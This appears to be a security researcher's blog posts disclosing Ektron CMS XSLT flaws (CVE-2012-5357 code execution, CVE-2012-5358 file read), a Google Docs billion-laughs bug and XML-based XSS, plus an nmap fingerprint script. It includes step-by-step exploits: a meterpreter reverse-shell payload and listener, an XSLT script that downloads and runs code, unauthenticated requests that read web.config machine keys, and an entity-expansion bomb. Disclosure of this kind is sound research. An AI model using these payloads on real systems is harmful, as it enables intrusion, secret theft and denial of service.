CVE-2012-5357,CVE-1012-5358 Cool Ektron XSLT RCE Bugs

In early 2011, I met a fully updated 8.02SP2 Ektron and it was a bunch of bugs at first sight. Ektron is a CMS. It isn’t a household name like wordpress, but it’s actually used on quite a few very big enterprise-like sites. Subsequently a few of these bugs have been found independently, but to my knowledge my favorites (CVE-2012-5357,CVE-1012-5358) have never been publicly written about.

I was originally planning to talk about these in our New Ways I’m Going to Hack your Web App talk which came over nine months after I reported the issue. In fact, it was a part of the talk at Bluehat, where it was a hit when I used Metasploit for the demo :)

Unfortunately, there was some pressure at the time to keep this out of the 28c3 and Blakhat AD versions of the talk. Booo. But on October 15th 2012, MSVR released an advisory, so at long last I’ll give some technical details on a couple of the more interesting bugs I found.

CVE-5357 – Unauthenticated code execution in the context of web server

The root cause of this is that Ektron processed user-controlled XSL from a page that required no auth. They used the XslCompiledTransform class with enablescript set to true. This scripting allows the user to execute code, as documented here.

Here are hack steps to get a meterpreter shell using this:

  1. Create the shellcode we’ll use using the following. At the time of the exploit, naming to .txt seemed to evade antivirus, although at some point this stopped working reliably.
  2. ./msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=80 r | ./msfencode –t exe –o output.txt
  3. Upload output.txt to
  4. Start a multistage metasploit listener from msfconsole on a reachable attacker box.
  5. use exploit/multi/handler
    set payload windows/meterpreter/reverse_http
    set LHOST <listen_address>
    set LPORT 80
  6. Upload the following code to
  7. <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
      <msxsl:script language="C#" implements-prefix="user">
    public string xml()
                System.Net.WebClient client = new System.Net.WebClient();
                client.DownloadFile(@"", @"C:\\windows\\TEMP\\test92.txt");
                System.Diagnostics.Process p = new System.Diagnostics.Process();
                p.StartInfo.UseShellExecute = false;
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.FileName = @"C:\\windows\\TEMP\\test92.txt";
               return "hai";
      <xsl:template match="/">
        <xsl:value-of select="user:xml()"/>
  8. Do the following post request, which will cause ektron to process the xsl. Ektron did check the referer, but it did NOT check any auth info, and there is no secret information in this POST request at all. Notice the xslt= which points to the xslt file we created in step 4. When processed, this will connect back to our listener we setup in step 1.
  9. POST /WorkArea/ContentDesigner/ekajaxtransform.aspx HTTP/1.1
    Host: ektronsite
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    Proxy-Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: https://ektronsite
    xml=AAA&xslt= &arg0=mode%3Ddesign&arg1=skinPath%3D%2FWorkArea%2Fcsslib%2FContentDesigner%2F& arg2=srcPath%3D%2FWorkArea%2FContentDesigner%2F&arg3=baseURL%3Dhttp%3A%2F%2Fektronsite& arg4=LangType%3D1033& arg5=sEditPropToolTip%3DEdit%20Field%3A

One of the early mitigations was to limit egress access, but it turns out you can just as easily specify the xsl inline. Another early mitigation was to IP restrict access to the Ektron management console. However, Ektron had multiple clientside vulnerabilities. We were able to blend clientside bugs with this to still exploit.

CVE-5358 Local File Read

After 5357 was fixed, I was testing that fix, and it turns out there was another related vulnerability. They had configured the xsl with enableDocumentFunction set to true. This vulnerability allows an unauthenticated attacker to read arbitrary files, such as web.config and machine.config. This would allow an attacker to perform several attacks, like bypassing authentication, modifying viewstate, bringing down the server, etc. I could spend a lot of time here, but we can agree reading the machinekey is bad.

Hack steps to retrieve the machinekey:

  1. URL encode the following xsl
  2. <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
      <xsl:template match="/">
        <xsl:value-of select="document('g:\EKTRON\web.config')//machineKey/@decryptionKey"/>
        <xsl:value-of select="foo"/>
  3. Do the following POST. Note this is unauthenticated
  4. POST /WorkArea/ContentDesigner/ekajaxtransform.aspx HTTP/1.1
    Host: ektronsite
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: https://ektronsite
    Content-Length: 1217
  5. In the response the decryptionkey will be echoed back F42A9567917AC601F476CB26731E4E116351E9465DBDB32A35DA23C01F4ED963


Remember in early 2011 when nmap scripting was fairly new? This was one of my first attempts at that. It isn’t much, but it helped me fingerprint the instances of ektron we had.

description = [[
Attempts to check if ektron is running on one of a few paths
-- @output
-- 80/tcp open  http
-- |_ http-login-form: HTTP login detected
-- HTTP authentication information gathering script
-- rev 1.0 (2011-02-06)
author = "Rich Lundeen"
license = "Same as Nmap--See"
categories = {"webstersprodigy"}
portrule = shortport.port_or_service({80, 443, 8080}, {"http","https"})
parse_url = function(url)
  local re ="^([^:]*):[/]*([^/]*)", 0, "C")
  local s, e, t = re:exec(url, 0, 0)
  local proto = string.sub(url, t[1], t[2])
  local host = string.sub(url, t[3], t[4])
  local path = string.sub(url, t[4] + 1)
  local port = string.find(host, ":")
  if port ~= nil then
    --TODO check bounds, sanity, cast port to an int
    local thost = string.sub(host, 0, port-1)
    port = string.sub(host, port+1)
    host = thost
    if proto == "http" then
      port = 80
    elseif proto == "https" then
      port = 443
  return host, port, path
--attempting to be compatible with nessus function in
--in this case, host is a url - it should use get_http_page
--get_http_page = function(port, host, redirect)
--port and url are objects passed to the action function
--redirect an integer to prohibit loops
get_http_page_nmap = function(port, host, redirect, path)
  if path == nil then
    path = "/"
  if redirect == nil then
    redirect = 2
  local answer = http.get(host, port, path)
  if ((answer.header.location ~= nil) and (redirect > 0) and
      (answer.status >=300) and (answer.status < 400)) then
    nhost, nport, npath = parse_url(answer.header.location)
    if (((nhost ~= host.targetname) and (nhost ~= host.ip) and
        (nhost ~= or nport ~= port.number ) then
      --cannot redirect more, different service
      return answer, path
      return get_http_page_nmap(port, host, redirect-1, npath)
  return answer, path
action = function(host, port)
  local ektronpaths = {
  for i,ektronpath in ipairs(ektronpaths) do
    local result, path = get_http_page_nmap(port, host, 3, ektronpath)
    local loginflags = pcre.flags().CASELESS + pcre.flags().MULTILINE
    local loginre = {"ektron" , loginflags, "C") }
    local loginform = false
    for i,v in ipairs(loginre) do
      local ismatch, j = v:match(result.body, 0)
      if ismatch then
        loginform = true
    if loginform then
      return "Ektron instance likely at " .. path


Supposedly the latest version of Ektron has patched this. I don’t have a version to work on at the moment so I’m unable to personally verify. Regardless – be sure to upgrade. With Ektron I’d also highly recommend segregating the management piece so that it’s not exposed. I’d recommend only trusting people to author content that you trust with the server. Also, people writing content probably shouldn’t be allowed to open Facebook in another browser tab…

For XSL in general – there are a lot of bad things attackers can do if you process untrusted XSL. I recommend trying to avoid processing untrusted XSL at all unless you really know what you’re doing. With .NET xslcompiledtransform for example, even if you disable scripting and enableDocumentFunction, it’s still difficult to prevent things like DoS attacks. A good rule of thumb is to treat consuming XSL like you would treat running code, because that’s essentially what it is.

Google Docs Billion Laughs

This is a writeup of a bug (now fixed) I reported to Google last year.

A billion laughs attack was present in the Google Docs document parser. When the engine would parse a document it would resolve internal entities by expanding them. This eventually earned me a spot on the Google Wall of Sheep, but alas, no reward because it’s a DoS bug and DoS bugs don’t qualify.

With any type of DoS bug on a large service, it’s fairly difficult to determine the exact severity. There might be things that mitigate this somewhat, like there is probably throttling, the APIs might restrict on a per user basis, etc. Regardless, with one request it’s likely that it could tie up a processor for some amount of time (evidence suggests at least a couple minutes, but I suspect a lot more). This was clearly a bug; Google Docs was resolving internal entities without limit which is a CPU intensive operation and requires very little client processing/bandwidth.

Here’s a link 17th order billion laughs document: test17. Unzip and look in content.xml. To increase order of attack, change the entity it points to (eg &a19;, &a20, etc). The attack itself is very straightforward, and for those who don’t want to look at the doc, it just looks something like this, generated mostly from a legitimate ODT file:

<!--?xml version="1.0" encoding="UTF-8"?-->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE billion [
  <!ENTITY a0 "Bomb!">
  <!ENTITY a1 "&a0;&a0;">
  <!ENTITY a2 "&a1;&a1;">
  <!ENTITY a25 "&a24;&a24;">
<text:p text:style-name="Standard">Test &a17;</text:p>

Here are some interesting metrics on various laugh sizes:

  • 16th order took about 4 seconds for the app to return
  • 17th order took about 8 seconds for the app to return
  • 18th order took about 20 seconds and the upload is eventually rejected, after several empty files are created with the same name
  • 20th order took about 1:20 and the upload is eventually rejected, dozens of empty files are created (I’m not sure what was going on with that).
  • 21st order never seemed to “finish”

One quick note is I never found anywhere that external entities were resolved. It’s hard to tell for sure because certain egress/chroot-type mitigations could have just helped make this hard to exploit. Correct or not, I sort of suspected the external entity thing might not be a problem. Openoffice resolved internal but not external entities, so (right or wrong) I guessed that it’s somewhat likely that Google is re-using or at least sort of mimicking openoffice’s document parser.

The reporting process was fairly nighmarish, but I put the blame mostly on MSVR rather than Google… not to point fingers, all I know is I never heard much of anything back.

In any serious service I think DoS bugs get a bad rap. I’ve met a lot of people who consider DoS bugs as low severity just based on that classification alone. In reality, I think people tend to care a lot more about when an online service is unavailable. When Sony did everything terribly, did most people care about the data they lost? Some did (I did), but I think most just wanted to start playing games again already. So what’s more severe? A clickjacking bug in Facebook that allows you to do a targeted attack to take over someone’s account, or a DoS bug that can bring down Facebook?

With some imagination, I wonder if something like this could have been used in the right (wrong?) hands to bring down a service as large as Google Docs.

Serving Back XML for XSS

In our “New ways I’m going to hack your web app” talk, one vulnerability example we had was with wordpress. There were three pieces to the attack 1) uploading an xsl file, 2) uploading an XML file that applied the XSL transform and 3) tossing the cookie up to execute script cross domain. Nicolas Grégoire watched our presentation and sent me an email wondering why we didn’t just use an XSLT stylesheet embedded in the XML. This is the same technique Chris Evans uses here: I didn’t know this was even possible, but it turns out it makes step#1 unnecessary.

In our original example, we had this xsl file saved as a jpg:

<?xml version="1.0" encoding="utf-8" ?>
 <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="">
<xsl:template match="/">
 <h3>got it!!!!!</h3>

And we had the xml that applied it as a wxr file.

<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="./badxsl.jpg"?>
 <x name="x">x</x>

These can be combined the same way Chris Evans does it. So for script execution in just the wxr file, the end result looks like this:

<?xml version="1.0" ?>
<?xml-stylesheet type="text/xsl" href="#stylesheet"?>
<!DOCTYPE responses[
<!ATTLIST xsl:stylesheet
<node />
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="">
<xsl:template match="/">
 <h3>got it!!!!!</h3>

This fires in IE9:


This doesn’t work in Firefox or Chrome. But if an app is serving back xml then you always have other tricks, like trying to get the browser to render the xml as xhtml. Like the following works in Chrome whatever and Firefox 9, but not IE.

<?xml version="1.0"?>
<html xmlns:html=''>

Is it already 2012?

I thought about starting a new blog, it’s been that long.

Giving our talk, “New ways I’m going to hack your web app” at Bluehat 2011 was awesome. I practiced so much that everything just went well. Unfortunately I managed to forget a ton of it for 28c3/Blackhat and I spoke way too fast (I always do the same thing when I get nervous and don’t think about it).  Not to mention all my favorite content was needlessly censored. That sucks, but hopefully as I talk more things will get better.

I hate watching that, by the way. The cool thing is there were a lot of people, I think the room holds about 1000. So that was scary, but also a great experience.

Here is the whitepaper:!249&parid=3AC0418833532DFF!264

and the slides:!250&parid=3AC0418833532DFF!264